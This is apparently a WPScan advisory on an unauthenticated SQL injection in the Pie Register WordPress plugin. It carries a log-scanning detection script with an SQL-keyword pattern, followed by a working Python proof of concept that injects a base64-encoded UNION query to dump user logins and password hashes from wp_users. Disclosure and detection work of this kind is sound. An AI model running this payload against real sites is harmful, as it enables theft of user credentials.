Pie Register 2.0.14-2.0.15 - SQL Injection



Description
User input is not validated correctly when an Invitation Code is accepted, so an SQL injection attack is possible. The attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are supplied to any page, by any user (anonymous or otherwise).
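As an added detection example (not part of this advisory or the plugin), the check below scans web-server access-log lines for requests that carry both parameters and whose base64-decoded ‘invitaion_code’ contains SQL metacharacters or keywords; the proof of concept shows the code is sent base64-encoded, so the decode step is what makes the payload visible. The log lines, client addresses and the `scan_log`/`classify_request` helpers are constructed for illustration.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs, quote

# Constructed sample access-log lines (combined log format); not real traffic.
# The third line carries a base64-encoded SQL payload in the invitation code.
PAYLOAD_BENIGN = quote(base64.b64encode(b"ABC-123").decode())
PAYLOAD_SQLI = quote(base64.b64encode(b"') UNION SELECT 1,2#").decode())
SAMPLE_LOG = (
    '203.0.113.5 - - [04/May/2015:10:00:01 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 1234\n'
    f'203.0.113.9 - - [04/May/2015:10:00:02 +0000] "GET /?show_dash_widget=1&invitaion_code={PAYLOAD_BENIGN} HTTP/1.1" 200 5678\n'
    f'198.51.100.7 - - [04/May/2015:10:00:03 +0000] "GET /?show_dash_widget=1&invitaion_code={PAYLOAD_SQLI} HTTP/1.1" 200 5678\n'
)

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Quote/comment characters and common SQL verbs that have no place in an invitation code.
SQLI_PATTERN = re.compile(
    r"(['\"`;#]|--|\b(union|select|insert|update|delete|drop|sleep|benchmark)\b)",
    re.IGNORECASE,
)


def decode_invitation_code(value):
    """Decode the base64 form the plugin expects; return None if it is not decodable."""
    value = value.strip()
    value += "=" * (-len(value) % 4)  # tolerate stripped padding, as lenient decoders do
    try:
        return base64.b64decode(value).decode("utf-8", errors="replace")
    except ValueError:
        return None


def classify_request(line):
    """Return (client_ip, decoded_code) when the line hits the vulnerable parameter
    pair with SQL metacharacters in the decoded code, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m.group(1)).query)
    if "show_dash_widget" not in qs or "invitaion_code" not in qs:
        return None
    for raw in qs["invitaion_code"]:
        decoded = decode_invitation_code(raw)
        if decoded is not None and SQLI_PATTERN.search(decoded):
            return line.split()[0], decoded
    return None


def scan_log(text):
    """Run classify_request over every line and keep the hits."""
    return [hit for hit in (classify_request(l) for l in text.splitlines()) if hit]
```

Because the decoded value, not the raw query string, is what reaches the database, a signature written against the raw URL would miss this payload entirely.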
Proof of Concept
import requests, base64, re

url = "http://localhost"
# The plugin base64-decodes the invitation code before using it, so the payload is encoded first
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query.encode()).decode()
params = {
    "show_dash_widget": 1,
    "invitaion_code": query_encoded,
}
r = requests.get(url, params=params)

# The injected result is reflected in the first table cell of the response
print(re.search(r"<tr><td>([^<]*?)<", r.text).group(1))

Affects Plugin Pie Register (fixed in version 2.0.16)

References

URL https://research.g0blin.co.uk/g0blin-00040/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 1340
Verified No
WPVDB ID 7958

Timeline

Publicly Published 2015-05-04
Added 2015-05-04
Last Updated 2015-07-04

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.